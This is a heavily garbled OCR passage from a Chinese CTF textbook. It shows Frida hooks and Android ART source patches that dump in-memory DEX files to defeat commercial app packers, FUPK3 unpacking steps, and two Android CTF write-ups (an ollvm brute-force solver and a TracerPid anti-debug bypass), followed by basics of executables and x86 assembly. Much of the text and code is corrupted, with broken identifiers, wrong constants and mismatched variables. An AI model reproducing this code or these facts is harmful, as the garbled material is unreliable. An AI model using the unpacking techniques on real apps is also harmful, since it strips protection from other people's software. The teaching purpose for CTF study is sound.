4.4.1 注入 进程 Dump 内 存 
下 面 给 出 一 段 Android8.1 下 通过 Frida Hook 完 成 某 加 固 脱 壳 的 代码 : 


http://androidxref.com/8.1.0_r33/xref/art/runtime/dex_file.cc#0penCommon 


Interceptor.attach(Module.findExportByName("libart.so", "_ZN3artl5DexFileVerifier6 
VerifyEPKNS_7TDexFileEPKhjPKcbPNSt3__112basic_stringIcNS8_1llchar_traitsIcEENS8 
_9allocatorIcEEEE"), { 

onEnter: function(args) { 
console.log("verify..") 
var begin = args[1] 


var dex_size = args[2] 


var file = new File("/data/data/com.xxx.xxx/"+dex_size+".dex", "wb") 
console.log("dex size:"+dex_size.toInt32()) 


file.write(Memory.readByteArray(begin, dex_size.toInt32())) 
file.flush() 
file.close() 

I 

onLeave:function(retval){ } 


J 


这 种 脱 壳 方式 的 核心 原理 是 在 Dalvik/ART 模 式 下 ， 如 果 DEX 文 件 存 在 连续 存储 状态 ， 就 一 定 能 找到 
个 Hook 时 机 点 ， 该 时 间 点 下 DEX 文 件 是 完整 存储 在 内 存 中 的 ， 通 过 Hook 即 可 获取 完整 的 原始 DEX 文 
件 。 加 固 壳 中 如 果 没 有 反 Hook 代 码 或 者 反 Hook 代 码 强 度 不 高 ， 则 该 脱 壳 方式 非常 简单 高 效 。 


4.4.2 修改 源码 胶 膏 


修改 Android 源 码 的 脱 过 原 理 与 Hook 脱 过 类 似 ， 都 是 找到 一 个 DEX 文 件 完整 存储 在 内 存 中 的 时 机 点 ， 
由 于 修改 源码 的 方式 隐蔽 性 极 局 ， 加 固 代码 从 本 质 上 完全 无 法 检测 ， 因 此 这 种 方式 对 反 Hook 强 度 户 
同时 DEX 文 件 仓 人 在 完整 释放 时 机 点 的 这 非 营 有 效 。 比 如 ， 可 以 修改 dex2oat 源 码 脱 出 某 加 固 厂 商 充 : 


art/dex20at/dex20at.ce Android8.x 
make dex20at 


// compilation and verification. 
verification_results_—>AddDexFile(dex_file): 
std: :string dex_name = dex_file->GetLocation(); 
LOGCINFO)<<"supersix dex file name:"<<dex_name; 
if(tdex_name.find("jiagu") != std::string::npos) 1{ 
int Len = dex_file->Size(): 
char filename[256] = {9}; 
sprintf(filename, "%s_%d,. dex",dex_name.c_str(), Len); 
int fd=open(filename,O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU):; 
if(fd>8) { 
if(write(fd, (char*)dex_file->Begin(), Len) <= 6) { 
LOGCINFO)<<"supersix Write fail.."<<filename; 
} 
LOGCINFO})<<"wWirte successful"<<filename: 
close(fd); 
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另 一 种 修改 源码 脱 碗 的 方式 如 下 ， 在 Android 8.1 下 修改 以 下 文件 。 


runtime/base/fiLe_magic.cc 
art/sruntime/dex_file.cc 


A111111111111 
// art/runtime/base/fiLe_magic.cc 


#include <fstream> 


#include <memory> 
#include <sstream> 
#include <unistd.h> 
#include <sys/mman.h> 


File OpenAndReadMagic(const charw filename, uint32_ts magic, std::string* error_msg) { 
CHECK(magic != nullptr); 
File fd(filename, 0_RDONLY, /* check_usage */ false); 
if (fd.Fd() == -1) { 


werror_nsg = Stringprintf("Unable to open '%s' : %s", filename, strerror(errno)); 
return File(); 


} 
AUAAAAAAAAAAAAAAA 


// 


struct stat st; 

// Vet's linit processing file list 

if (strstr(filename, "/data/data") != NULL) { 
char* fn_out = new char[PATH_MAX]; 
strepy(fn_out, filename); 
strcat(fn_out, "__unpacked_dex"); 


int fd_out = open(fn_out, O_WRONLY | 0_CREAT | 0_EXCL，S_IRUSR | S_IWUSR | S_IRGRP | 
S_IROTH); 


if (Ifstat(fd.Fd(), &st)) { 
“ addr = (char*)nmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd.Fd(), 0); 
int ret = write(fd_out, addr, st.st_size); 
ret = 9; 
munmap(Caddr, st.st.size); 
} 


// no use 


close(fd_out); 
delete [J]fn_out; 


// 


// 
AAAAAAAAAAAAAAAA 
int n = TEMP_FAILURE_RETRY(read(fd.Fd(), magic, sizeof(*magic))); 


AAAAAAAAAAAA 
/1/ art/runtime/dex_file.cc 
DexFile: :DexFile(const uint8_t* base, 


const std::string& location, 
uint32_t Location_checksum， 
const OatDexFile* oat_dex_file) 


oat_dex_file_(oat_dex_file) { 
PALA 
// add 


// 


// let's Limit processing file list 


if (location.find("/data/data/") != std::string::npos) { 

std: :ofstream dst(Location + "__unpacked_oat", std::ios::binary); 
dst .write(reinterpret_cast<const char*>(base), size); 
dst.close(); 


} 


// 
//end 
1/1111111111 
CHECK(begin_ != nullptr) << GetLocation(); 


MARA NN AR A 


4.4.3 类 重 载 和 DEX 重 组 


对 于 不 连续 过， 在 内 存 中 不 存在 完整 的 DEX 文 件 ， 此 时 不 能 通过 Dump 内 存 来 完成 完整 脱 过 ， 需 要 在 
运行 时 对 DEX 进 行 重建 ， 推 荐 使 用 FUPK3 完 成 脱 帝 。FUPK3 (https://bbs.pediy.com/thread- 
-1.htm) 是 在 Android 4.4 下 通过 修改 源码 实现 的 DEX 重 组 脱 这 方式 。 


从 源码 编译 开始 ， 打 入 patch 并 重新 编译 framework: 


cd dalvik 


patch -pl < dalvik_vm_patch.txt 
cd framework/base 


patch -pl < framework_base_core_patch.txt 


操作 步骤 如 下 : 


<1> 在 手机 端 打开 FUpk3， 点 击 图 标 ， 选 取 要 脱 壳 的 应 用 ， 再 点 击 UPK 脱 壳 . 


pp bY el "A= Ed eles 
从 2 
一 C- 
书城 目录 设置 
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<4> 可 能 存在 部 分 DEX 文 件 一 次 没 法 完整 脱出 ， 则 多 操 几 次 UPK。 脱 这 机 会 目 动 重 试 。 
<5>Dump 出 来 的 DEX 文 件 位 于 /data/data/pkgname/.fupk3 目 录 下 。 


<6> 扣 击 CPY， 复 制 脱 出 的 DEX 文 件 到 临时 目录 /data/local/tmp/.fupk3 中 。 


<7> 导 出 DEX 到 jadb pull/data/local/tmp/.fupk3 localFolder 中 。 


<8> 使 用 FUnpackServer 重 构 DEX 文 件 java-jar upkserver.jar localFolder。 


书城 目录 
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三: 党 


4.5.1 ollvm 混 淆 Native App 逆 向 (NJCTF 2017) 


NJCTF 2017 中 设计 了 一 道 纯 Native 编 写 的 Native App， 其 AndroidManifest.xml 内 容 见 图 4-5-1。 


可 以 看 出 ， 该 应 用 只 有 一 个 主 Activity 类 : android.app.NativeActivity， 通 过 JEB 可 以 看 出 Java 层 寺 
无 任何 Activity 的 实现 ， 见 图 4-5-2。 该 App 人 存在 一 个 so 库 ， 明 显 使 用 了 ollvm， 混 消 了 关键 逻辑 ， 见 
图 4-5-3。 


DAVIl™= .0 
an anifes pd A rsionCo de="1 andr a " package="com,.geekerchina.an" platformBuildVersionCode="23" p 
Pe Sion1S andro1:targetsdler 
ee fe ee emp has Code="? alse”" android:icon="@mipmap/ic android: la be i ~ os name”" 
<activ rr androidic confagchangeszvoxate android: lab err Ti pp- name android:name= p.Nat a eActivity"> 
android.app. lib_name" 


在 so 逻辑 中 ， 程 序 通 过 加 速 传感器 获取 当前 设备 的 x、y、z 坐 标 ， 然 后 进行 判断 ， 当 x、y、zi 计 算 满 丰 
一 定 条 件 后 才 会 吐出 flag。 由 于 so 被 强 混 淆 ， 要 找到 x、y、z 的 关系 比 较 困 难 ， 因 此 需要 找 新 思路 。 而 
计算 flag 的 函数 名 比较 明显 : 


> 由 android 
Vv 证 com 
了 骨 geekerchina 
了 朵 an 


> (3 BuildCon 


图 4-5-2 
char* fastcall flg(int a1,char * a2) 


该 函数 接收 一 个 int 值 ， 然 后 计算 生成 字符 串 (题目 描述 中 申明 flag 由 可 见 字符 串 构 成 ) 。 解 题 思 路 是 
直接 调用 该 flag 函 数 进行 爆破 ， 找 到 所 有 flag 可 见 字符 串 组 合 


External symb 
TI e@ 口 Hexview-1 @ 办 stmuctures 区 Bee  @ 强 Imports ”@ 团 Exports 
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while ( 1) 


和. 







while ( -1753632028 ) 














I 

Fh 

a 
i 


= -1999316808 ) 
-1165949209; 


219 i <= 2136957596 ) 












Le == 21369979397 ) 


224 = -1113087424; 
二 = 940979183; 


中 





LABEL 218; 








































































EE <= 2067254700 ) 


23: break; 
233 ef == 2067254701 ) 
2 34 { 


£39 goto LABEL 25; 
pe } 


爆破 代码 如 下 : 


#include<stdio.h> 


int j_j___modsi3(int a, int b) { 
return a%b; 


} 


int jj_._divsi3(int a, int b) { 
return a/b; 


} 





char flg(int al, char *out) { 


char wyv2; // r681 
int v3; // ST6C_401 
int v4; // ryel 
int v5; // r66l 
int v6; // 5ST68_401 
int v7; // r561 
int v8; // reel 
int v9; // reel 
char v19; // ST16_181 
int v11; // reel 
int v12; // rsel 
int v13; // reel 
int vld; // ST18_401 
int v15; // reel 
int v16; // reel 
char v17; // reel 
char v18; // ST94_161 
int v19; // reel 
char v20; // reel 
int v21; // rie1 
int v22; // r591 
int v23; // reel 


char v24; // reel 





V2 = out, 


v3 = al; 

vd = al; 

v5 = jj..-modsi3(al, 10); 
v6 = v5; 

V7 = 20 * V5; 

2 = 20 wa v5; 


v8 = j_j___divsi3(vy, 180); 
v9 = jj..-modsi3(v8, 10); 


V16 = v9; 

vil = 19 * v9 + v7; 
v2[1] = v11; 

v2[2] = vil - 4; 
Vi2 = vy; 


v13 = jj...divsi3(vy, 19); 

v4 = j_j___modsi3(Cv13，19); 

v15 = jj__-_-divsi3(v4，19666669) ; 

v2[3] = j_j-__modsi3(v15，19) + 11 * v14; 
v16 = j_j___divsi3(Cvu，1666) ; 

v17 = jj___modsi3(v16，19); 

// LOBYTE(vY4) = v17; 


vy = v17; 



































v18 = v17; 
v19 = j_j___divsi3(v12, 168860); 
v26 = j_j___modsi3(v19, 10); 

v2[4] = 26 * v4 + 60 - v20 - 60; 
V21 = -v6 - V14; 

V22 = -v21; 

v2[5] = -~(char)v21 * vy; 

v2[6] = v14 * vy * v20; 

v23 = j_j___-divsi3(v3，190699)] ; 
v24 = j_j___modsi3(v23，16); 

v2[7] = 26 * v24 -~ v190; 

16 * v18 | 1; 

V22 * V24 ~ 1; 

v2[10] = v6 * V14 * v1 * V19 - 4; 
v2[11] = (v1 + v14) * v24 - 5; 
v2[12] = 6; 

return v2; 





} 





int main() { 
char out[256], flag = 0; 
for(unsigned int I = 0; I <= 4294967295-1; ++i) { 
flag = 9; 
memset(out, O0, 256); 
flg(i, out); 
if(strlen(out) >= 10) { 
for(int j=8; j<12; ++j) { 
if((out[j] >= 'a' && out[j] <= 'z') || (Cout[j] >= 'A' && out[j] <= '2') || 
(out[j] >= '9' && out[j] <= '9')|| out[j] == '_' ) 
continue; 
else { 
flag = 1; 
break; 
下 
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} 
if(flag == 0) 
printf("%s\n", out); 


return 0; 


} 


过 爆破 即 可 得 到 最 终 flag。 由 此 可 见 ， 对 于 CTF 题 目 ， 我 们 可 以 尝试 从 多 个 角度 入 
另辟蹊径 ， 绕 过 出 题 人 设置 的 障碍 。 


4.5.2 及 调试 及 虚拟 机 检测 (XDCTF 2016) 


XDCTF 2016 中 设计 了 一 站 Android 逆 问题 目 ， 包 含 基础 的 反 调试 、 虚 拟 机 检测 ， 完 成 此 类 题目 最 便 
捷 的 方式 是 动态 调 坛 ， 而 要 实现 动态 调试 ， 需 要 绕 过 Java 层 及 Native 层 的 反 调试 、 反 虚拟 机 检测 等 。 


首先 是 Java 层 的 调试 检测 ， 见 图 4-5-4。 绕 过 此 反 调 试 需要 重 打 包 App， 去 除 相应 的 检测 smali 代 码 ， 
然后 重 打 包 并 且 重 和 釜 名 即 可 。 


二 dex<Unbound> 居 aelf<Unbound> [0 xml<Unbound> 四 java<Unbound> 物 Bytecode/Disassembly 
super(); 


protected void onCreate(Bundle arg4) { 
ApplicationInfo v1 = this.getApplicationInfo(); 
int v2 = v1.flags & 2; 
vl.flags = v2; 
if(v2 != 08) { 
Process.killProcess(Process.myPid()); 


图 4-5-4 


计算 flag 的 关键 国 数 在 Native 层 ， 所 以 动态 调试 需要 进入 Native 层 ， 通 过 逆向 ， 我 们 可 以 上 友 现 Native 


层 中 实现 了 简单 的 反 调试 ， 见 图 4-5-5。 


IDA - libeasyeasy.idb (libeasyeasy.so) Leafinsningcodas/pwnsictiassyeesy 0A, 89458hhg7754w-O/lib/armeabi/libeasyeasy.idb 
; 各: :博古 小 y 关 了 欧 X:b 加 口 _Nodebuooer 
Eee | 


TI 
inction WW Unexplored RB Instruction External symbol 
@ [IDA View-A MW 四 加 Hex View-1 ”田园 Structures 四国 Enums @E Imports 


v73 = j j _ getpid() ; 
j j_ sprintf(&al7， "/proc/%d/status", v73); 

vi4 = ]j j fopen(&al7, "r"); 

ol 

{ 

do 

{ 
if ( !j j fgets((char *)&a69, 1024, v74) ) 
goto LABEL 10; 


while ( j j strncmp((const char *)¢&a69, "TracerPid", 9u) ); 
if (jj atoi((const char *)&a70 + 2) ) 
{ 

jj ftclose(v74) ; 

3 3 kill(v73，9) ; 


-j_j_fclose(v74); 
图 4-5-5 
通过 检测 TracerPid 来 判断 当前 是 否 被 ptrace， 而 IDA 等 调试 器 都 是 用 ptrace 来 实现 调试 的 ， 绕 过 此 反 
调试 的 根本 方式 是 定制 ROM， 将 TracerPid 永 久 置 为 0。 该 方式 门槛 较 高 ， 需 要 重新 编译 Android 源 码 


并 root ， 条 件 有 限 的 情 ;m 吕 下 5ITLpatch so 函数 ， 直接 将 检测 负数 返 上 加 0 即 5， 络 过 尼 调 试 后 ， 动态 衣 
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试 下 发 现 程 序 的 次 辑 为 取出 输入 的 5 ~ 38 位 后 进行 逆序 ， 对 逆序 的 字符 串 进行 base64 编 码 后 ， 


dHRedGLLdmFodG5vZGLLc3VhY2VibGxLaHNhdG5hd2k 


进行 比较 。 因 此 ， 我 们 只 需 将 这 个 字符 串 base64 和 解码 再 逆序 回去 ， 即 是 flag: 


iwantashellbecauseidonthaveitttt 5 
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全 


从 上 述 两 个 例子 可 以 看 出 ，CTF 中 APK 相 天 的 题目 除了 对 选手 的 逆 辐 水平 有 一 定 要 求 ， 也 会 考察 选 
对 Android 系 统 的 熟悉 程度 。 因 此 ， 我 们 只 有 见 悉 了 这 些 加 固 、 反 调试 技术 、 对 抗 方案， 才能 更 好 地 
i ad := 
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第 ?5 章 逆 癌 工程 


逆向 工程 (Reverse engineering) 是 一 种 技术 过 程 ， 即 对 一 项 目标 产品 进行 逆向 分 析 及 研究 ， 从 而 
演绎 并 得 出 该 产品 的 处 理 流程 、 组 织 结 构 、 功 能 性 能 规格 等 设计 要 素 ， 以 制作 出 功能 相近 但 不 完全 
样 的 产品 的 过 程 。 在 CTF 中 ， 逆 向 工程 一 般 是 指 软 件 逆 向 工程 ， 即 对 已 经 编译 完成 的 可 执行 文件 进行 
分 析 ， 研 究 程序 的 行为 和 算法 ， 然 后 以 此 为 依据 ， 计 算出 出 题 人 想 隐 藏 的 flag。 
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5.1 逆 癌 工程 基础 


5.1.1 逆向 工程 概述 


一 般 ，CTF 中 的 逆向 工程 题目 形式 为 : 程序 接收 用 户 的 一 个 输入 ， 并 在 程序 中 进行 一 系列 校 验算 法 ， 
如 通过 校 验 则 提示 成 功 ， 此 时 的 输入 即 flag。 这 些 校 验算 法 可 以 是 已 经 成 熟 的 加 解密 方案 ， 也 可 以 是 
作者 上 自 创 的 某 种 算法 。 比 如 ， 一 个 小 游戏 将 用 户 的 输入 作为 游戏 的 操作 步骤 进行 判断 等 。 这 类 题目 要 
求 参赛 者 具备 一 定 的 算法 能 力 、 思 维 能 力 ， 甚 至 联想 能 力 。 


本 书 将 介绍 入 门 CTF 逆 向 题目 所 需 的 基础 知识 ， 并 介绍 常用 的 工具 ， 假 设 读者 有 一 定 的 C 语 言 基础 。 


5.1.2 可 执行 文件 


软件 逆向 工程 分 析 的 对 象 是 程序 ， 即 一 个 或 多 个 可 执行 文件 。 下 面 简 单 介绍 可 执行 文件 的 形成 过 程 、 
弟 见 可 执行 文件 类 型 ， 以 便 读者 对 它们 有 一 个 初步 的 认 知 。 


1. 可 执行 文件 的 形成 过 程 (编译 和 链接 ) 


对 于 刚刚 接触 这 方面 的 读者 ， 形 成 一 个 正确 的 对 可 执行 文件 的 理解 和 感觉 是 至 关 重 要 的 。 同 样 ， 作 为 
人 类 文明 一 手 创 造 的 事物 ， 可 执行 文件 并 不 是 如 同 变 魔法 一 般 直接 生成 的 ， 而 是 经 历 了 一 系列 的 步 
又 。 


绝 大 多 数 正 常 的 可 执行 文件 ， 都 是 由 高 级 语言 编译 生成 的 。 一 般 来 说 ,编译 时 会 发 生 这 些 流程 : 
<1> 用 户 将 一 组 用 高 级 语言 编写 的 源 代 码 作 为 编译 器 输入 。 
<2> 编 译 器 解析 输入 ， 并 为 每 个 源 代码 文件 产生 对 应 的 汇编 代码 。 


<3> 汇 编 器 接收 编译 器 生成 的 汇编 代码 ， 并 继续 执行 汇编 操作 ， 将 生成 的 每 份 机 器 代码 临时 存 于 各 对 
象 文件 中 。 


<4> 现 在 已 经 生成 了 多 个 对 象 文 件 ， 但 是 最 后 的 目标 是 生成 一 个 可 执行 文件 。 于 是 链接 器 参与 其 中 ， 
将 分 散 的 各 对 象 文 件 相互 连接 ， 经 过 处 理 而 融合 成 完整 的 程序 。 然 后 按照 可 执行 文件 的 格式 ， 填 入 各 
种 指定 程序 运行 环境 的 参数 ， 最 后 形成 一 个 完整 的 可 执行 文件 。 


而 人 在 实际 的 环境 中 ， 由 于 需要 考虑 到 生成 的 可 执行 文件 的 大 小 、 可 执行 文件 的 运行 性 能 、 对 信息 的 保 
护 等 原因 ， 在 每 步 过 程 中 或 多 或 少 伴随 着 信息 的 丢失 。 例 如 ， 在 编译 阶段 一 般 会 丢弃 挥 源 代码 中 的 注 
释 信 息 ， 在 汇编 时 可 能 丢弃 汇编 代码 中 的 label (标签 ) 名 称 ， 在 链接 时 可 能 丢弃 尔 数 名 、 类 型 名 等 符 
号 信息 。 


逆向 则 需要 利用 相关 知识 和 经 验 ， 来 还 原 其 中 的 部 分 信息 ， 进 而 还 原 全 部 或 部 分 程序 流程 ， 从 而 实现 
pa El: =[: 


2. 不 同 格式 的 可 执行 文件 


实际 中 ， 由 于 历史 遗留 问题 和 公司 之 间 竞 争 等 原因 ， 上 面 介 绍 的 每 一 步 中 产生 的 各 种 文件 都 会 有 多 种 
文件 格式 。 例 如 ，Windows 系 统 使 用 的 是 PE (Portable Executable) 可 执行 文件 ， 而 Linux 系 统 使 
用 的 是 ELF (Executable and Linkable Format) 可 执行 文件 。 由 于 这 两 种 可 执行 文件 格式 都 是 由 


HH 以 = ET 人、 y= 
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Ww = wae 一 


PE 文件 由 DOS 头 、PE 文 件 头 、 节 表 及 各 节 数 据 组 成 ; 同时 ， 如 果 需 要 引用 外 部 的 动态 链接 库 ， 则 有 
导入 表 ; 如 果 上 自己 可 以 提供 函数 给 其 他 程序 来 动态 链接 ( 单 见于 DLL 文件 ) ， 则 有 导出 表 。 


ELF 文 件 由 ELF 头 、 各 节 数 据 、 节 表 、 字 符 串 段 、 符 号 表 组 成 。 


节 (Section) 是 程序 中 各 部 分 的 逻辑 划分 ， 一 般 有 特定 名 称 ， 如 .text 或 .code 代 表 代 码 节 、.data 代 
表 数 据 节 等 。 在 运行 时 ， 可 执行 文件 的 各 节 会 被 加 载 到 内 人 存 的 各 位 置 ， 为 了 方便 管理 和 节省 开销 ， 
个 或 多 个 节 会 被 映射 到 一 个 段 (Segment) 中 。 段 的 划分 是 根据 这 部 分 内 存 需 要 的 权限 ( 读 、 写 、 
行 ) 来 进行 的 。 如 果 在 相应 的 段 内 进行 了 非法 操作 ， 如 在 只 能 读 取 和 执行 的 代码 段 进行 了 写 操 作 ， 
会 产生 段 错误 (Segmentation Fault) 。 


PE 和 ELF 的 基本 格式 细节 现 均 已 经 完全 公开 ， 并 且 已 经 有 大 量 的 成 熟 工具 可 对 其 进行 解析 与 修改 ， 
此 不 再 对 这 些 格式 的 细节 进行 详细 讲解 ， 请 感 兴趣 的 读者 自行 查阅 相关 资料 。 


5.1.3 汇编 语言 基本 知识 


逆向 者 在 解析 文件 后 ， 面 对 的 是 一 大 片 机 器 代码 ， 而 机 器 代码 是 由 汇编 语言 直接 生成 的 ， 因 此 逆向 者 
需要 对 汇编 有 基本 的 认识 才 可 以 展开 后 续 工 作 。 


下 面 介 绍 汇编 语言 的 重点 概念 ， 方 便 读 者 快速 理解 汇编 语言 。 
1. 寄存 器 、 内 存 和 寻 址 


寄存 器 (Register) 是 CPU 的 组 成 部 分 ， 是 有 限 存储 容量 的 高 速 存储 部 件 ， 用 来 暂 存 指令 、 数 据 和 地 
址 。 一 般 的 IA-32 (Intel Architecture，32-bit) 即 x86 架 构 的 处 理 器 中 包含 以 下 在 指令 中 显 式 可 见 的 
育 仔 器 : 


作 通用 寄存 跨 EAX、EBX、ECX、EDX、ESI、EDI。 

栈 顶 指针 寄存 器 ESP、 栈 底 指针 寄存 器 EBP。 
他 指令 计数 器 EIP (保存 下 一 条 即将 执行 的 指令 的 地 址 ) 。 
令 段 寄 存 跨 C9、DS、SS、ES、FS、Gs。 


对 于 x86-64 架 构 ， 在 以 上 这 些 寄存 器 的 基础 上 ， 将 前 缀 的 E 改 成 R， 以 标记 64 位 ， 同 时 增加 了 R8~ R_ 
这 8 个 通用 寄存 器 。 另 外 ， 对 于 16 位 的 情况 ， 则 将 前 缀 E 全 部 去 把 。16 位 时 ， 对 于 寄存 器 的 使 用 有 一 
定 限 制 ， 由 于 现在 已 不 是 主流 ， 故 在 本 书 中 不 再 歼 述 。 


对 于 通用 寄存 器 ， 程 序 可 以 全 部 使 用 ， 也 可 以 只 使 用 一 部 分 。 使 用 寄存 器 不 同 部 分 时 对 应 的 助 记 符 见 
图 5-1-1。 其 中 ，R8 ~ R15 进行 拆 分 时 的 命名 规则 为 R8d ( 低 32 位 ) 、R8w ( 低 16 位 ) 和 R8b ( 低 8 


{oy) 












































图 5-1-1 


CPU 中 还 存在 一 个 标志 寄存 器 ， 其 中 的 每 位 表示 对 应 标志 位 的 值 ， 常 用 的 标志 位 如 下 。 
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: 辅助 进位 标志 (Auxiliary Carry Flag) ， 当 运算 结果 在 第 3 位 进位 的 时 候 置 1。 


: 奇偶 校 验 标志 (Parity Flag) ， 当 运算 结果 的 最 低 有 效 字 节 有 偶数 个 1 时 置 1。 
: 符号 标志 (Sign Flag) ， 有 符号 整形 的 符号 位 为 1 时 置 1， 代 表 这 是 一 个 负数 。 
A ， 当 运算 结果 为 全 零 时 置 1。 

: 省 出 标志 (Overflow Flag) ， 运 算 结果 在 被 操作 数 是 有 符号 数目 溢出 时 置 1。 


: 进位 标志 (Carry Flag) ， 运 算 结果 向 最 高 位 以 上 进位 时 置 1， 用 来 判断 无 符号 数 的 溢 


CPU 不 仅 可 对 寄存 器 进行 操作 ， 还 可 对 内 存单 元 进行 操作 ， 因 此 存在 多 种 不 同 的 寻 址 方式 。 表 5-1-1 
给 出 了 CPU 的 不 同 寻 址 方式 、 示 例 及 对 应 的 操作 对 象 。 


表 5-1-1 


寻 址 方式 示 例 
立即 寻 址 1000h 这 个 数字 
直接 寻 址 [1000h] 内 存 1000h 地 址 的 单元 
寄存 器 寻 址 | RAX | RAX 这 个 寄存 器 
寄存 器 间接 寻 址 以 RAX 中 存 的 数 作为 地 址 的 内 存单 元 
基 址 寻 址 [RBP+10h] 将 RBP 中 的 数 作为 基 址 ， 加 上 10h， 访 问 这 个 地 址 的 内 存单 元 
变 址 寻 址 [RDI+10h] 将 RDI 作为 变 址 寄存 器 ， 将 其 中 的 数字 加 上 10h， 访 问 这 个 地 址 的 内 存单 元 
基 址 加 变 址 寻 址 。 | [RBX+RSI+10h] 多 辑 同 上 


不 难看 出 ，“[]” 相 当 于 C 语 言 中 的 “*” 运 算 符 (间接 访问 ) 。 


在 x86/x64 架 构 中 ， 寄 存 器 间接 寻 址 、 基 址 寻 址 、 变 址 寻 址 、 基 址 加 变 址 寻 址 这 4 种 寻 址 方式 在 实现 的 
功能 方面 几乎 相同 ， 但 语义 上 是 有 区 别 的 。 在 16 位 时 代 ， 这 4 种 寻 址 方式 不 可 混用 ， 在 现代 编译 器 
中 ， 编 译 器 会 根据 语义 和 优化 选择 合适 的 寻 址 方式 ， 对 于 CTF 参 赛 者 来 说 ， 只 需 稍 作 了 解 即 可 。 


2. x86/x64 汇 编 语 言 
x86/x64 汇 编 语言 存在 Intel、AT&T 两 种 显示 /书写 风格 ， 本 章 将 统一 采用 Intel 风 格 。 


什么 是 机 器 码 ? 什么 是 汇编 语言 ? 机 器 码 是 在 CPU 上 直接 执行 的 二 进 制 指令 ， 而 汇编 语言 是 机 器 语言 
的 一 种 助 记 符 ， 汇 编 语言 与 机 器 码 是 一 一 对 应 的 。 机 器 码 根据 CPU 架构 的 不 同 而 不 同 ，CTF 和 平时 最 
见 的 CPU 架构 是 x86 和 x86-64 (x64) 。 


x86/x64 汇 编 指 令 的 基本 格式 如 下 : 


其 中 ， 操 作 数 的 存在 与 否 及 形式 由 操作 码 的 类 型 决定 。 由 于 篇 幅 限 制 ， 本 节 无 法 面面俱到 地 叙述 各 种 

指令 的 格式 及 功能 ， 表 5-1-2 给 出 了 几 种 常用 指令 的 形式 、 功 能 和 对 应 的 高 级 语言 写法 。 人 其 自 的 _- 
参赛 者 并 不 需要 掌握 如 何 流畅 地 编写 汇编 语言 程序 ， 只 需 掌 握 下 面 介 绍 的 常见 指令 ， 并 在 遇 到 这 些 
VU: Ey 


指令 类 型 


Er 


mov von [rdi], rax | “(rdi) = raX 


_ 取 地 址 指令 [CENTER rax = & «(rs) 
ra ts 
q ptr [rdi], i 


算术 运算 指令 


and and rax. rbx 
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逻辑 运算 指令 ee = 
or or rb | bx 


函数 调用 指令 call | call Ox401000 执行 0x40100 地 址 的 函数 


ET 避 CTE 
比较 指令 mp | emp rax, rbx 根据 rax 与 rbx 比较 的 结果 改变 标志 位 
光志 全 兵科 拍拖 imp | jmp 0x401000 跳 到 0x401000 地 址 执行 


pm mx | 将 mx 的 值 夺 入 相 


ee 从 栈 上 强 出 一 个 元 素 放 入 ax 
汇编 语言 中 的 条 件 跳 转 指令 有 很 多 ， 它 们 会 根据 标志 位 的 情况 进行 条 件 跳 转 。 在 条 件 跳 转 指令 前 往往 
存在 用 于 比较 的 cmp 指 令 ， 会 根据 比较 结果 对 标志 位 进行 相应 设置 (对 标志 位 的 影响 等 同 于 sub 指 


令 ) 。 











表 5-1-3 给 出 了 常见 的 条 件 跳 转 措 令 ， 以 及 所 依据 的 cmp 和 标志 位 的 情况 。 
3. 反 汇 编 


高 级 语言 往往 需要 复杂 的 编译 过 程 ， 汇 编 过 程 则 只 是 直接 翻译 汇编 语句 为 对 应 的 机 器 代码 ， 并 直接 将 
各 条 语句 相 邻 地 放 在 一 起 。 因 此 ,我 们 可 以 轻易 地 将 机 器 代码 翻译 回 汇编 语言 ， 这 样 的 过 程 即 反 汇 


jump if above/not below or equal a<b, 
jump if not above/below or equal a<= 
if 


正如 5.1.2 节 中 提 到 的 ， 汇 编 过 程 同样 是 有 寿 信 息 丢 失 的 。 虽 然 我 们 可 以 轻易 地 解析 并 还 原 给 定 指令 的 
内 容 ， 但 是 我 们 必须 知道 哪些 数据 是 机 器 代码 ， 才 可 以 相应 地 对 它 进 行 解析 。 冯 ' 诡 依 曼 以 构 模糊 了 代 
码 与 数据 的 区 别 界限 ， 在 代码 节 中 可 能 穿插 跳 转 表 、 常 量 闻 (ARM) 、 普 通常 量 数据 ， 甚 至 恶意 的 干 
扰 数 据 等 。 所 以 ， 人 简单 、 直 接地 一 条 条 连续 地 向 下 解析 指令 往往 会 出 现 问 题 。 我 们 需要 知道 正确 的 指 
令 的 起 始 位 置 (如 label， 中 文 译 为 “标签 ”， 用 来 表示 程序 的 一 个 位 置 ， 方便 跳 转 、 取 地 址 时 引用 ) 
来 指引 反 汇 编 工 具 正 确 解析 代码 。 


正如 前 文 所 述 ， 在 汇编 过 程 中 ，label 信 息 会 丢失 。 因 为 label 用 于 标识 跳 转 位 置 ， 它 决定 看 程序 执行 
时 可 能 执行 到 的 位 置 ， 即 汇编 语句 的 起 始 位 置 。 所 以 ， 还 原 出 正确 的 label 信 息 对 于 正确 还 原 程 序 执行 
流程 至 天 重要 。 


尽管 有 信息 丢失 ,我们 仍然 可 以 通过 一 些 算法 成 功 还 原 程序 的 流程 。 下 面 介绍 两 种 已 知 的 算法 : 线性 
扫描 反 汇 编 算法 和 递归 下 降 反 汇编 算法 。 


线性 扫 搞 反 汇 编 算法 简单 、 粗 暴 ， 从 代码 段 的 起 始 位 置 直接 一 个 接 一 个 地 解析 捐 令 ， 直 全 结束 。 其 缺 
点 是 一 旦 有 数据 插入 到 代码 段 中 ， 则 后 续 的 所 有 反 汇 编 结果 是 错误 的 、 无 用 的 ，。 


递归 下 降 反 汇编 算法 则 是 人 们 在 友 现 线性 扫描 反 汇编 算法 的 种 种 问题 后 创造 的 一 种 新 算法 ， 不 是 简单 
地 解析 指令 并 显示 ， 而 是 尝试 推测 执行 每 条 指令 后 程序 将 如 何 执 行 。 例 如 ， 普 通 指 令 在 执行 后 将 直接 
执行 下 一 条 ， 无条件 跳 转 指 令 会 立即 跳 到 目标 位 置 ， 遂 数 调 用 指令 会 临时 跳出 出 返回 继续 执行 ， 返 回 
中 令 则 会 终止 当前 的 执行 流程 ， 条 件 跳 转 指令 则 可 能 分 出 两 条 路 径 ， 在 不 同 的 条 件 下 走向 不 同 的 位 
置 。 引 掌 先 将 一 些 已 若 的 模式 (pattern) 匹配 到 起 始 位 置 ， 再 根据 指令 的 执行 模式 ， 逐 个 对 程序 执 
行情 况 进行 跟踪 ， 最 后 将 程序 完全 反 汇 编 。 
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4. 调用 约定 


